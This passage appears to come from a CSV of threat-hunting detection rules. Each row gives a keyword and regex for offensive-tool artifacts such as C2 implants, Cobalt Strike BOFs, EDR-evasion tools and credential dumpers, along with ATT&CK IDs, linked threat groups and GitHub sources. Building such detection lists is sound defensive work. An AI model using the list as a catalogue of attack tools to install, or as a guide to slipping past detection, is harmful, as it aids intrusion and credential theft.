Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/rvrsh3ll/BOF_Collection","1","0","N/A","N/A","10","10","635","57","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z","48573" "*inline-execute *.o*",".{0,1000}inline\-execute\s.{0,1000}\.o.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","48574" "*inline-execute *tokenprivileges.o*",".{0,1000}inline\-execute\s.{0,1000}tokenprivileges\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","48575" "*inline-execute StartWebClientSvc.x64.o*",".{0,1000}inline\-execute\sStartWebClientSvc\.x64\.o.{0,1000}","offensive_tool_keyword","NTLMRelay2Self","An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).","T1078 - T1078.004 - T1557 - T1557.001 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/med0x2e/NTLMRelay2Self","1","0","N/A","N/A","10","5","400","42","2024-01-27T08:52:03Z","2022-04-30T10:05:02Z","48576" "*inline-execute*whereami.x64*",".{0,1000}inline\-execute.{0,1000}whereami\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/whereami","1","1","N/A","N/A","10","10","172","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z","48577" "*inlineExecute.nim*",".{0,1000}inlineExecute\.nim.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","48578" "*InlineExecute-Assembly*",".{0,1000}InlineExecute\-Assembly.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly 
module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","1","N/A","N/A","10","10","657","130","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z","48579" "*InlineShellcode*",".{0,1000}InlineShellcode.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","48580" 
"*InlineWhispers.py*",".{0,1000}InlineWhispers\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","N/A","10","10","315","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z","48581" "*InlineWhispers2*",".{0,1000}InlineWhispers2.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","N/A","10","10","185","28","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z","48582" "*INotGreen/GlllPowerloader*",".{0,1000}INotGreen\/GlllPowerloader.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","1","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","48584" 
"*INotGreen/SharpThief*",".{0,1000}INotGreen\/SharpThief.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","1","N/A","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","48585" "*INotGreen/XiebroC2*",".{0,1000}INotGreen\/XiebroC2.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","1","N/A","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","48586" "*Input Merlin message base:*",".{0,1000}Input\sMerlin\smessage\sbase\:.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","48587" "*input/shellcode_enc_raw.txt*",".{0,1000}input\/shellcode_enc_raw\.txt.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","48588" "*input/shellcode_raw.txt*",".{0,1000}input\/shellcode_raw\.txt.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","48589" "*ins1gn1a/Frampton*",".{0,1000}ins1gn1a\/Frampton.{0,1000}","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","Exploitation tool","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","N/A","1","75","19","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z","48590" "*InsecurePowerShell*",".{0,1000}InsecurePowerShell.{0,1000}","offensive_tool_keyword","InsecurePowerShell","powershell without securities features","T1059 - T1086 - T1117","TA0002 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/cobbr/InsecurePowerShell","1","0","N/A","N/A","N/A","2","104","18","2017-12-19T03:40:33Z","2017-12-17T02:16:21Z","48591" "*insecurityofthings*jackit*",".{0,1000}insecurityofthings.{0,1000}jackit.{0,1000}","offensive_tool_keyword","jackit","This is a partial implementation of Bastilles MouseJack exploit. See mousejack.com for more details. 
Full credit goes to Bastilles team for discovering this issue and writing the libraries to work with the CrazyRadio PA dongle. Also. thanks to Samy Kamkar for KeySweeper. to Thorsten Schroeder and Max Moser for their work on KeyKeriki and to Travis Goodspeed. We stand on the shoulders of giants.","T1210 - T1212 - T1560 - T1562","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/insecurityofthings/jackit","1","0","N/A","N/A","N/A","9","842","152","2020-10-01T04:37:00Z","2016-07-01T23:21:56Z","48592" "*INSERT INTO LDAPHUNTERFINDINGS *",".{0,1000}INSERT\sINTO\sLDAPHUNTERFINDINGS\s.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","10","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","48593" "*insert_top_100_passwords_1_G*",".{0,1000}insert_top_100_passwords_1_G.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","48594" "*InsidePro-PasswordsPro.rule*",".{0,1000}InsidePro\-PasswordsPro\.rule.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","48595" "*InspectAssembly.csproj*",".{0,1000}InspectAssembly\.csproj.{0,1000}","offensive_tool_keyword","InspectAssembly","Inspect's a target .NET assembly's CIL for calls 
to deserializers and .NET remoting usage to aid in triaging potential privilege escalations.","T1055.012 - T1027 - T1112","TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/matterpreter/OffensiveCSharp/tree/master/InspectAssembly","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","48596" "*InspectAssembly.exe*",".{0,1000}InspectAssembly\.exe.{0,1000}","offensive_tool_keyword","InspectAssembly","Inspect's a target .NET assembly's CIL for calls to deserializers and .NET remoting usage to aid in triaging potential privilege escalations.","T1055.012 - T1027 - T1112","TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/matterpreter/OffensiveCSharp/tree/master/InspectAssembly","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","48597" "*install powershell-empire*",".{0,1000}install\s\spowershell\-empire.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - 
BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48598" "*install * roadrecon*",".{0,1000}install\s.{0,1000}\sroadrecon.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","0","#linux","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","48599" "*install bloodhound*",".{0,1000}install\sbloodhound.{0,1000}","offensive_tool_keyword","BloodHound","A Python based ingestor for BloodHound","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","0","N/A","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","48600" "*install c2tc-domaininfo*",".{0,1000}install\sc2tc\-domaininfo.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","48601" "*install cdn-proxy*",".{0,1000}install\scdn\-proxy.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","N/A","3","249","24","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z","48602" "*install certsync*",".{0,1000}install\scertsync.{0,1000}","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145 - T1649","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","10","7","633","66","2024-03-20T10:58:15Z","2023-01-31T15:37:12Z","48603" "*install coercer*",".{0,1000}install\scoercer.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","48604" "*--install -d kali-linux*",".{0,1000}\-\-install\s\-d\skali\-linux.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","48605" "*install dploot*",".{0,1000}install\sdploot.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential 
Access","https://github.com/zblurx/dploot","1","0","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","48606" "*install gobuster*",".{0,1000}install\sgobuster.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","0","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","48609" "*install h8mail*",".{0,1000}install\sh8mail.{0,1000}","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Reconnaissance","https://github.com/opencubicles/h8mail","1","0","N/A","N/A","N/A","1","11","4","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z","48610" "*install hakrawler*",".{0,1000}install\shakrawler.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/hakluke/hakrawler","1","0","#linux","N/A","6","10","4683","520","2024-12-21T20:40:03Z","2019-12-15T13:54:43Z","48611" "*install hping3*",".{0,1000}install\shping3.{0,1000}","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","N/A","10","1533","341","2024-07-10T12:38:39Z","2012-06-13T17:41:54Z","48612" "*install hydra-gtk*",".{0,1000}install\shydra\-gtk.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential 
Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","48613" "*install impacket*",".{0,1000}install\simpacket.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","48614" "*install Jira-Lens*",".{0,1000}install\sJira\-Lens.{0,1000}","offensive_tool_keyword","Jira-Lens","Fast and 
customizable vulnerability scanner For JIRA written in Python","T1083 - T1065 - T1204 - T1087 - T1203","TA0007 - TA0005 - TA0001","N/A","N/A","Reconnaissance","https://github.com/MayankPandey01/Jira-Lens","1","0","N/A","N/A","N/A","4","318","52","2024-12-31T20:06:51Z","2021-11-14T18:37:47Z","48615" "*install kerbrute*",".{0,1000}install\skerbrute.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","48616" "*install macchanger*",".{0,1000}install\smacchanger.{0,1000}","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","0","N/A","N/A","8","1","67","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z","48617" "*install p0f*",".{0,1000}install\sp0f.{0,1000}","offensive_tool_keyword","p0f","P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications","T1046 - T1040","TA0007 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.kali.org/tools/p0f/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","48618" "*install pivotnacci*",".{0,1000}install\spivotnacci.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","Sandworm","C2","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","N/A","9","10","697","114","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z","48619" "*install pivotnacci*",".{0,1000}install\spivotnacci.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - 
TA0011","N/A","Sandworm","C2","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","N/A","9","10","697","114","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z","48620" "*install proxychains*",".{0,1000}install\sproxychains.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","48621" "*install pypykatz*",".{0,1000}install\spypykatz.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","48623" "*install s3scanner*",".{0,1000}install\ss3scanner.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the 